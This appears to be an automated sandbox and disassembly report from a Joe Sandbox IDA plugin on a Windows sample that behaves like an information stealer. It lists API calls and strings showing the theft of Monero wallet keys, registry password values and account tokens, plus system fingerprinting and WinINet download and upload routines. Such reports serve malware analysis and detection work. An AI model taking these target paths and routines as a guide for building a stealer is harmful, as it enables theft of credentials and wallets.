Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$J&f
API String ID: 460715078-2398766951
Opcode ID: 274e3f792ec3db14fe8b5dc27bb16b9769716356b3fa8f20fb0828a67ad38914
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: 274e3f792ec3db14fe8b5dc27bb16b9769716356b3fa8f20fb0828a67ad38914
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,0406C1E0,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

- , xrefs: 00414D40
%s\%s, xrefs: 00414BEA
?, xrefs: 00414B17

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: ea198df32fb3f38c870a1feb3a56e4a9a70f91b3b2a48daf6e3f309b18a0f3c8
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: ea198df32fb3f38c870a1feb3a56e4a9a70f91b3b2a48daf6e3f309b18a0f3c8
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 47233f5f2a6ac108ed9c2d40d7802ad1b122a578098b672625895cdb083911f5
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: 47233f5f2a6ac108ed9c2d40d7802ad1b122a578098b672625895cdb083911f5
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9

Strings

.keys, xrefs: 0040132B
SOFTWARE\monero-project\monero-core, xrefs: 004012F5
wallet_path, xrefs: 004012F0
\Monero\wallet.keys, xrefs: 0040134D

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: cc506cc900b1d8de20fb67180724c8fe89b673c0262401868f97255737152c4b
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: cc506cc900b1d8de20fb67180724c8fe89b673c0262401868f97255737152c4b
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

lstrcat.KERNEL32(36BF7020,0041DEB8), ref: 00406FD6
lstrcat.KERNEL32(36BF7020,00000000), ref: 00407018
lstrcat.KERNEL32(36BF7020, : ), ref: 0040702A
lstrcat.KERNEL32(36BF7020,00000000), ref: 0040705F
lstrcat.KERNEL32(36BF7020,0041DEC0), ref: 00407070
lstrcat.KERNEL32(36BF7020,00000000), ref: 004070A3
lstrcat.KERNEL32(36BF7020,0041DEC4), ref: 004070BD
task.LIBCPMTD ref: 004070CB

Strings

: , xrefs: 0040701E
h0A, xrefs: 00406FA6, 00406FA9
`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: : $`v@$h0A
API String ID: 3191641157-3559972273
Opcode ID: 90ba860eb88153124b5ff0dd3d9899c95f8f381682475dbda3cd4adffff03995
Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
Opcode Fuzzy Hash: 90ba860eb88153124b5ff0dd3d9899c95f8f381682475dbda3cd4adffff03995
Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00415836

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: 9a9d15ccce1688aa5f0ddc31980a02235787a91170649dd34c88eef5399de2d3
Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
Opcode Fuzzy Hash: 9a9d15ccce1688aa5f0ddc31980a02235787a91170649dd34c88eef5399de2d3
Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404CC1, 00404DA0
c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
Opcode ID: 0de907d42740b73276ee4841b6eaeb85befe0f9a3eb9d020644180b68549cc61
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: 0de907d42740b73276ee4841b6eaeb85befe0f9a3eb9d020644180b68549cc61
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

task.LIBCPMTD ref: 00406F25

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

:, xrefs: 004141F9
\, xrefs: 004141FD
C, xrefs: 004141E9

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 004093C3, 00409486
'@, xrefs: 00409426, 00409449, 00409429, 0040946F

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: '@$'@
API String ID: 1815715184-345573653
Opcode ID: 8b55da906079f4b7e2c67570a1be054e10abea7064ba0d58136f1bac8616076b
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: 8b55da906079f4b7e2c67570a1be054e10abea7064ba0d58136f1bac8616076b
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,040864A8,00000000,?,0041D774,00000000,?,00000000,00000000,?,040863E8), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

@, xrefs: 0041498A
%d MB, xrefs: 004149E0

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,04083B38), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 33d80e034ad8f542e0ef5a467f467662f582e0545ae4ff6488c0ef396ccf234c
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: 33d80e034ad8f542e0ef5a467f467662f582e0545ae4ff6488c0ef396ccf234c
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D9E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
memset.MSVCRT ref: 00413E2A
??_V@YAXPAX@Z.MSVCRT ref: 00413F7E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 58fa82f264080733bae1e7b8f01e14ae4a67fe3ffc4adbed189253538e0755ae
Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
Opcode Fuzzy Hash: 58fa82f264080733bae1e7b8f01e14ae4a67fe3ffc4adbed189253538e0755ae
Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

AccountId, xrefs: 0040B472
SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB
AccountTokens, xrefs: 0040B319
AccountTokens, xrefs: 0040B28A

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: 7d4500fa2934594752666061c9df31e8c65c16c470467cd37b1ac9dbbd13c62c
